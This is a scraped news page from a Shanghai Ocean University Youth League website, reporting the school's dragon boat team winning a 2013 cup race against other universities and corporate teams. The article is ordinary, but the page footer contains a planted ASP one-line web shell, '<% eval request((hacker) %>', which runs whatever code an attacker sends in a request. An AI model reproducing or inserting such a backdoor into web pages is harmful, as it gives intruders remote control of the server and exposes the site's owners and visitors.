当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校龙舟队在“霸王杯”龙舟争霸赛中勇夺霸王杯
[2013年10月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    在刚刚结束的2013首届“上海培生龙舟俱乐部霸王杯”龙舟争霸赛上我校龙舟队又获佳绩,最终捧起霸主杯。来自代表上海市龙舟最高水平的3所高校,上海海洋大学、上海海事大学、上海第二工业大学与3家知名企业:交通银行、上证所、泛亚汽车进行对抗赛,高校队获得“霸主杯”,我校以3次小组第一的佳绩为此次胜利推波添彩,且创造了本次赛事最好成绩。

 我校龙舟队遥遥领先

教练与队员合影

    13日的上海一改前两日的阴雨天气,艳阳高照,比赛地点张家浜河道两侧站满前来观赛的市民。锣鼓声响起,伴着两岸市民的喝彩声,A、B、C三组分时段进行了激烈的角逐,最终上海海洋大学以每组小组第一的优异成绩领衔高校组夺冠!

    培生龙舟俱乐部“霸王杯”龙舟争霸赛是上海培生龙舟俱乐部承办的首届企业与高校之间的龙舟争霸赛,是构建企业与高校之间沟通与交流的重要平台。相信有了此次成功的经验,以后的大赛将会越办越好。                  

 

关闭窗口

上一篇:校领导一行到成教高职学院调研工作

下一篇:我校召开节约型校园节能监管平台专家咨询(初验收)会
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>